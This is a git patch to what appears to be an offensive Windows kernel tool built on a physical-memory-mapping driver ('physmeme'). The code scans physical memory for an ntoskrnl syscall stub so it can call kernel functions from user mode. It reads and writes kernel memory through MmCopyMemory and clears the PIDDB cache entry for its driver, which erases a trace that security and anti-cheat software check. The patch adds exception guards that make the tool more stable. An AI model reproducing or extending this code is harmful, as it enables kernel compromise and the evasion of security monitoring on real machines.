From ea2f644ac091d655888cf9aa957317cb240e14ce Mon Sep 17 00:00:00 2001 From: xerox Date: Wed, 28 Oct 2020 18:14:37 -0700 Subject: [PATCH] stability patch for physmeme... --- nasa-tables/kernel_ctx/kernel_ctx.cpp | 138 ++++++++++++++------------ nasa-tables/main.cpp | 3 +- nasa-tables/mem_ctx/mem_ctx.cpp | 3 - 3 files changed, 73 insertions(+), 71 deletions(-) diff --git a/nasa-tables/kernel_ctx/kernel_ctx.cpp b/nasa-tables/kernel_ctx/kernel_ctx.cpp index c841ae5..0ce3040 100644 --- a/nasa-tables/kernel_ctx/kernel_ctx.cpp +++ b/nasa-tables/kernel_ctx/kernel_ctx.cpp @@ -1,5 +1,4 @@ #include "kernel_ctx.h" -#include "../mem_ctx/mem_ctx.hpp" namespace nasa { @@ -8,6 +7,13 @@ namespace nasa if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer) return; + ntoskrnl_buffer = reinterpret_cast( + LoadLibraryExA( + "ntoskrnl.exe", + NULL, + DONT_RESOLVE_DLL_REFERENCES + )); + nt_rva = reinterpret_cast( util::get_module_export( "ntoskrnl.exe", @@ -16,13 +22,6 @@ namespace nasa )); nt_page_offset = nt_rva % PAGE_SIZE; - ntoskrnl_buffer = reinterpret_cast( - LoadLibraryExA( - "ntoskrnl.exe", - NULL, - DONT_RESOLVE_DLL_REFERENCES - )); - std::vector search_threads; //--- for each physical memory range, make a thread to search it for (auto ranges : util::pmem_ranges) @@ -43,29 +42,34 @@ namespace nasa if (begin + end <= 0x1000 * 512) { auto page_va = nasa::map_phys(begin + nt_page_offset, end); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(end); - if (page_va) { // scan every page of the physical memory range for (auto page = page_va; page < page_va + end; page += 0x1000) + { if (!is_page_found.load()) // keep scanning until its found - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandleA(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandleA(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} + } + } nasa::unmap_phys(page_va, end); } } @@ -77,9 +81,6 @@ namespace nasa for (auto range = begin; range < begin + end; range += 0x1000 * 512) { auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(0x1000 * 512); - if (page_va) { // loop every page of 2mbs (512) @@ -87,21 +88,25 @@ namespace nasa { if (!is_page_found.load()) { - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} } } nasa::unmap_phys(page_va, 0x1000 * 512); @@ -110,30 +115,31 @@ namespace nasa // map the remainder and check each page of it auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(remainder); - if (page_va) { for (auto page = page_va; page < page_va + remainder; page += 0x1000) { if (!is_page_found.load()) { - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} } } nasa::unmap_phys(page_va, remainder); @@ -197,12 +203,15 @@ namespace nasa ); if (mm_copy_memory) - syscall( + { + syscall + ( mm_copy_memory, buffer, address, size ); + } } void kernel_ctx::wkm(void* buffer, void* address, std::size_t size) @@ -218,12 +227,15 @@ namespace nasa ); if (mm_copy_memory) - syscall( + { + syscall + ( mm_copy_memory, address, buffer, size ); + } } void* kernel_ctx::get_physical(void* virt_addr) @@ -237,10 +249,7 @@ namespace nasa "MmGetPhysicalAddress" ); - return syscall( - mm_get_physical, - virt_addr - ); + return syscall(mm_get_physical, virt_addr); } void* kernel_ctx::get_virtual(void* addr) @@ -256,10 +265,7 @@ namespace nasa PHYSICAL_ADDRESS phys_addr; memcpy(&phys_addr, &addr, sizeof(addr)); - return syscall( - mm_get_virtual, - phys_addr - ); + return syscall(mm_get_virtual,phys_addr); } bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp) diff --git a/nasa-tables/main.cpp b/nasa-tables/main.cpp index 5aa6f3a..86a1c3c 100644 --- a/nasa-tables/main.cpp +++ b/nasa-tables/main.cpp @@ -4,11 +4,10 @@ int __cdecl main(int argc, char** argv) { - // only time driver needs to be loaded is to init physmeme/kernel_ctx... nasa::load_drv(); nasa::kernel_ctx kernel; if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) - std::cout << "[+] flushed PIDDB Cache for physmeme driver..." << std::endl; + std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl; nasa::unload_drv(); const std::pair my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } }; diff --git a/nasa-tables/mem_ctx/mem_ctx.cpp b/nasa-tables/mem_ctx/mem_ctx.cpp index a1c445d..4bf3a68 100644 --- a/nasa-tables/mem_ctx/mem_ctx.cpp +++ b/nasa-tables/mem_ctx/mem_ctx.cpp @@ -100,9 +100,6 @@ namespace nasa void* mem_ctx::set_page(void* addr) { - if (!addr) - return {}; - // // table entry change. //